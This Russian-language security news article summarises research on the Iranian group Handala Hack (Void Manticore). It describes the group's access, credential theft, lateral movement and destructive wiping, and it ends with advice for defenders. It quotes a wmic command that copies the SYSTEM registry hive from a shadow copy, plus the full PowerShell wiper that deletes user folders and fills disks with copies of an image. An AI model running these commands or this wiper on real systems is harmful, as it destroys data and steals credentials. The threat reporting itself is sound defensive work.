Иранцы взламывают примитивно, но смертельно: украденный VPN, права админа и четыре вайпера уничтожат всё

Иранская группа Handala Hack, которую связывают с кластером Void Manticore и Министерством разведки и безопасности Ирана, продолжает действовать по довольно жесткой, но не слишком сложной схеме: получить доступ, быстро закрепиться внутри сети, пройтись по инфраструктуре вручную и запустить сразу несколько способов уничтожения данных. В новом разборе исследователи описали не только привычный набор приемов группы, но и несколько свежих деталей. Среди них - использование NetBird для прокладки приватных туннелей внутри скомпрометированной среды и PowerShell-вайпер с признаками ИИ-помощи при написании кода.

Под именем Handala Hack скрывается не отдельная разовая кампания, а 1 из публичных масок Void Manticore. У этой структуры есть и другие известные образы - Karma и Homeland Justice. Именно Homeland Justice долгое время использовалась в операциях против Албании, в том числе против госструктур и телеком-сектора. Handala, напротив, прежде всего ассоциировалась с атаками на израильские организации, но теперь география уже не ограничивается Израилем. Исследователи отдельно упоминают и атаки на американские компании, включая производителя медицинских технологий Stryker.

По данным отчета, техники, тактики и процедуры группы, то есть TTPs, с 2024 по 2026 год почти не изменились. Void Manticore по-прежнему делает ставку на ручную работу внутри сети, коммерческие и общедоступные инструменты, готовые вайперы, публичные утилиты для удаления файлов и шифрования, а также криминальные сервисы для начального доступа и получения вредоносного инструментария. Важный нюанс здесь в другом: даже без особенно экзотических приемов группа добивается серьезного разрушительного эффекта, потому что действует быстро, использует привилегированные учетные записи и бьет по нескольким направлениям сразу.

Исследователи считают, что персонажи Handala, Karma и Homeland Justice тесно связаны между собой. В инцидентах, которые относили к этим фронтам, совпадали не только общие приемы, но и участки кода в используемых вайперах. У Karma и Homeland Justice вдобавок прослеживалось сотрудничество с другим иранским кластером, Scarred Manticore. В некоторых случаях картина выглядела особенно показательно: сообщения внутри зараженной среды и надписи, которые оставляли злоумышленники, указывали на Karma, а украденные данные в итоге сливали уже через Handala. Авторы допускают, что изначально Karma и Handala могли быть 2 отдельными командами или 2 ветками внутри 1 структуры, а потом фактически слились под более заметным брендом Handala. Косвенно на это указывает исчезновение Karma из публичного поля и доминирование Handala в более новых операциях.

По открытым данным, Void Manticore пересекается с активностью, которую связывали с подразделением внутренней безопасности MOIS, в частности с антитеррористическим направлением под руководством Сейеда Яхьи Хоссейни Панджаки. Исследователи отмечают, что Панджаки, по сообщениям в открытых источниках, погиб на начальном этапе израильских ударов по Ирану в начале марта 2026 года. Для самой техники атак такая деталь напрямую ничего не меняет, но помогает точнее вписать кластер в более широкий иранский контекст.

Начальный доступ Handala, по наблюдениям авторов, часто строится вокруг подрядчиков, ИТ-компаний и сервис-провайдеров. Логика проста: через такого посредника можно добраться сразу до нескольких чужих сетей. Группа давно охотится за учетными данными и особенно активно использует уже скомпрометированные VPN-аккаунты. За последние месяцы исследователи увидели сотни попыток входа и перебора паролей по организационной VPN-инфраструктуре, которые связали с инфраструктурой Handala. Такие подключения часто шли через коммерческие VPN-узлы, а на стороне источника регулярно встречались дефолтные имена Windows-машин в духе DESKTOP-XXXXXX или WIN-XXXXXX.

После январского отключения интернета в Иране картина немного изменилась. Исследователи увидели схожую активность уже с IP-адресов, относимых к Starlink, и отмечают, что такой паттерн сохранялся и дальше. Параллельно у группы просел уровень оперативной дисциплины. Если раньше операторы старались прятать трафик за коммерческими VPN и не светить прямое происхождение, то в более новых эпизодах стали встречаться и прямые подключения с иранских IP-адресов. Раньше, когда группа работала по целям в Израиле, она обычно выходила наружу через сегмент 169.150.227.X. Иногда эта маскировка ломалась, и связь все же просвечивала либо с иранских адресов, либо с VPS. После начала войны, как считают исследователи, поддерживать прежний уровень маскировки стало труднее. В отдельных случаях злоумышленникам удавалось выходить через израильский узел 146.185.219[.]235, который, по оценке авторов, тоже был связан с VPN-сервисом, хотя уже не совпадал с прежней инфраструктурой.

Отдельно описан сценарий, в котором доступ к сети, предположительно использованный позже в разрушительной фазе, появился за месяцы до самого удара. Исследователи полагают, что ранний доступ дал злоумышленникам возможность закрепиться, собрать нужные учетные данные и, главное, добраться до уровня Domain Admin, то есть администратора домена Active Directory. В последние часы перед разрушительной фазой Handala, по их оценке, проверяла работоспособность доступа и тестировала аутентификацию с уже украденными учетными данными.

Часть предударной активности немного отличалась от обычного почерка группы, поэтому авторы осторожно оговаривают, что не все шаги можно с полной уверенностью приписать именно Handala. Тем не менее в этой цепочке были характерные для подготовки атаки действия: отключение защит Windows Defender, выполнение разведки внутри среды, кража учетных данных и попытка забрать дополнительный полезный груз с отдельного сервера управления по адресу 107.189.19[.]52.

Дальше злоумышленники перешли к извлечению учетных данных сразу несколькими способами. В отчете упоминается дамп процесса LSASS через comsvcs.dll с помощью rundll32.exe. LSASS - это системный процесс Windows, в памяти которого могут находиться учетные данные и материалы, полезные для дальнейшего продвижения по сети. Параллельно атакующие экспортировали чувствительные ветки реестра, включая HKLM. Также в инфраструктуре запускался ADRecon под именем dra.ps1. Это PowerShell-фреймворк для разведки в средах Active Directory: с его помощью можно собрать сведения о пользователях, группах, доверительных связях, компьютерах и администраторских ролях. Именно на этой стадии, по мнению исследователей, злоумышленники, вероятно, и получили права Domain Admin, которые затем использовали уже в вайпинг-операции Handala.

В отчете приведен и 1 из замеченных командных фрагментов, использованный для копирования данных из теневой копии диска:

wmic.exe /node:[REDACTED_HOSTNAME] /user:[REDACTED] /password:[REDACTED] process call create "cmd.exe /c   copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system  c:\users\public"

После получения доступа и привилегий группа переходила к боковому перемещению по сети. Здесь Handala, по словам исследователей, по-прежнему работает в основном руками. Главный инструмент для перехода между системами - RDP, то есть обычный протокол удаленного рабочего стола. Через него операторы заходят на уже взломанные хосты и перемещаются по среде почти как обычный администратор. Но если нужные машины нельзя было достать напрямую извне, в дело вступал уже более интересный инструмент - NetBird.

NetBird - это легитимная платформа для построения защищенных приватных mesh-сетей по zero-trust-модели. Проще говоря, она позволяет связать между собой машины так, чтобы доступ между ними шел через зашифрованный туннель и не зависел от привычной прямой сетевой видимости. Для злоумышленника это очень удобно: если 1 машина уже под контролем, через такой инструмент можно протянуть внутрь собственную приватную сеть и добраться до других узлов. В описанном случае NetBird ставили вручную. Операторы подключались к скомпрометированным системам по RDP, открывали штатный браузер и скачивали клиент прямо с официального сайта NetBird. После установки на нескольких машинах внутри сети они получали дополнительную внутреннюю связность и могли действовать быстрее. В 1 инциденте исследователи увидели как минимум 5 разных машин под управлением атакующих, которые одновременно работали внутри среды.

Разрушительная фаза выглядела особенно жестко. Чтобы нанести максимальный ущерб, группа задействовала сразу 4 разные техники вайпинга параллельно. Такое дублирование нужно не ради красоты. Если 1 способ сработает не везде или будет частично остановлен, другой все равно продолжит уничтожение данных. Для распространения разных вайперов по сети злоумышленники использовали Group Policy, то есть групповые политики Active Directory. Это очень сильный инструмент в корпоративной Windows-среде: через него можно централизованно раздавать скрипты и задания сразу на множество машин.

Первый компонент исследователи назвали Handala Wiper. В некоторых случаях файл фигурировал как handala.exe. Вайпер распространялся через запланированное задание, созданное с помощью logon-скриптов в групповых политиках. Скрипт handala.bat запускал 2 компонента - исполняемый файл и PowerShell-скрипт. Исследователи отдельно подчеркивают интересную деталь: сам исполняемый файл стартовал удаленно с контроллера домена и не записывался на диск пораженных машин. Такой прием помогает затруднить детектирование и разбор после инцидента. Внутри системы вредоносный код перезаписывал содержимое файлов, а также использовал техники вайпинга через MBR, то есть через главную загрузочную запись. Повреждение MBR может сделать систему не только непригодной для работы, но и серьезно усложнить восстановление.

На завершающей стадии операторы запускали еще 1 самописный компонент - PowerShell-вайпер. Он тоже распространялся через logon-скрипты групповых политик и поэтому мог быстро разойтись по множеству машин. Логика работы у него простая, но очень разрушительная: скрипт рекурсивно перечисляет файлы внутри пользовательских каталогов и удаляет их. Исследователи считают, что по структуре кода и по подробным комментариям этот PowerShell-скрипт, вероятно, писали с помощью ИИ. В финале скрипт еще и раскладывал по логическим дискам изображение handala.gif, чтобы оставить заметную визуальную метку атаки.

Ниже приведен полный фрагмент PowerShell-кода, который исследователи включили в отчет:

$usersFolder = C:\Users
   
  # Ensure the folder exists
  if (Test-Path $usersFolder) {
      # Get all items in C:\Users, but not the Users folder itself
      $items = Get-ChildItem -Path $usersFolder -Recurse
   
      # Remove each item (files and subfolders) inside C:\Users
      foreach ($item in $items) {
          try {
              Remove-Item -Path $item.FullName -Recurse -Force -ErrorAction Stop
          } catch {
              Write-Host Could not delete: $($item.FullName)
          }
      }
  }
   
   
   
  $sourceFile = \\[REDACTED]\SYSVOL\[REDACTED]\scripts\Administtration\install\handala.rar
  $destinationFolder = C:\users
   
   
  if (!(Test-Path $destinationFolder)) {
      New-Item -ItemType Directory -Path $destinationFolder | Out-Null
  }
   
  $driveLetter = (Split-Path $destinationFolder -Qualifier).TrimEnd(':','\')
   
  $i = 0
   
  while ((Get-PSDrive $driveLetter).Free -gt (Get-Item $sourceFile).Length) {
      Copy-Item $sourceFile $destinationFolder\Handala_$i.gif
      $i++
  }

Помимо самописных вайперов группа использовала и вполне легальный софт - VeraCrypt. Обычно VeraCrypt известен как инструмент для шифрования дисков и контейнеров, который применяют для защиты данных. В атаке Handala его превратили в еще 1 слой разрушения. Оператор подключался к хосту по RDP, через штатный браузер скачивал VeraCrypt с официального сайта и затем применял шифрование системных дисков. Для жертвы это особенно неприятно: даже если часть вайперов сработала не полностью или где-то была остановлена, зашифрованные диски все равно могут остаться недоступными и сильно усложнить восстановление.

В некоторых случаях группа вообще не усложняла себе жизнь и удаляла данные вручную. Исследователи наблюдали эпизоды, когда операторы через RDP заходили на машины, выделяли файлы и просто удаляли их. Аналогично они удаляли виртуальные машины прямо из платформы виртуализации. Такой прием выглядит примитивно, но в условиях уже полученных привилегий и хорошего контроля над средой работает вполне эффективно. Более того, подобное поведение исследователи видели не только в самих инцидентах, но и в видеороликах и слитых материалах, которые публиковала сама Handala.

Общий вывод отчета довольно прямой. Handala и связанный с ней кластер Void Manticore не делают ставку на редкие высокотехнологичные трюки. Их модель держится на довольно простых, но действенных шагах: украденные учетные данные, быстрый вход в сеть, ручное перемещение по инфраструктуре, туннелирование через легитимные инструменты, групповые политики для массового распространения и несколько параллельных способов уничтожения данных. Именно поэтому оборона от таких операций остается в значительной степени классической: чем надежнее закрыты базовые пути доступа и чем быстрее замечена ручная активность внутри сети, тем меньше шансов у атакующих дойти до разрушительной фазы.

В рекомендациях защитникам исследователи советуют прежде всего жестко включать многофакторную аутентификацию, особенно для удаленного доступа и привилегированных учетных записей. Отдельное внимание стоит уделять аномальной аутентификации: входам из стран, где организация раньше не работала, первым входам в необычное время, цепочкам из множества неудачных попыток с последующим успешным логином, регистрации новых устройств, необычным объемам передачи данных во время VPN-сеанса и аутентификации через новые ASN или хостинг-провайдеров.

Также авторы рекомендуют ограничивать доступ из географий и инфраструктур повышенного риска. В отчете отдельно говорится о блокировке входящих подключений из Ирана на периметре и на сервисах удаленного доступа, если только для этого нет подтвержденной бизнес-необходимости. Аналогичный совет касается диапазонов Starlink, которые, по наблюдениям исследователей, уже использовались иранскими операторами. Если полная блокировка невозможна, предлагается хотя бы включать условный доступ, усиливать требования к аутентификации и отдельно мониторить такие диапазоны.

Еще 1 важный блок рекомендаций касается RDP. Его предлагают максимально ограничивать, усиливать защиту и отключать там, где он реально не нужен. Отдельно полезно искать RDP-подключения с машин, у которых остались стандартные имена Windows вроде DESKTOP-XXXXXX или WIN-XXXXXXXX, особенно если такие сеансы начинаются вне рабочего времени. Наконец, стоит отслеживать использование потенциально нежелательного ПО: систем удаленного администрирования и мониторинга, VPN-клиентов вроде NetBird, а также туннельных утилит, включая SSH для Windows.

История Handala хорошо показывает неприятную, но важную вещь: для крупного разрушительного инцидента не всегда нужен сложный имплант нового поколения. Иногда хватает украденного VPN-доступа, прав администратора домена, удаленного рабочего стола, пары легитимных утилит и группы операторов, которые готовы быстро пройтись по сети руками. Именно поэтому такие кампании опасны не только для громких политических целей, но и для обычных компаний, у которых базовая гигиена удаленного доступа и внутреннего администрирования все еще держится на старых допущениях.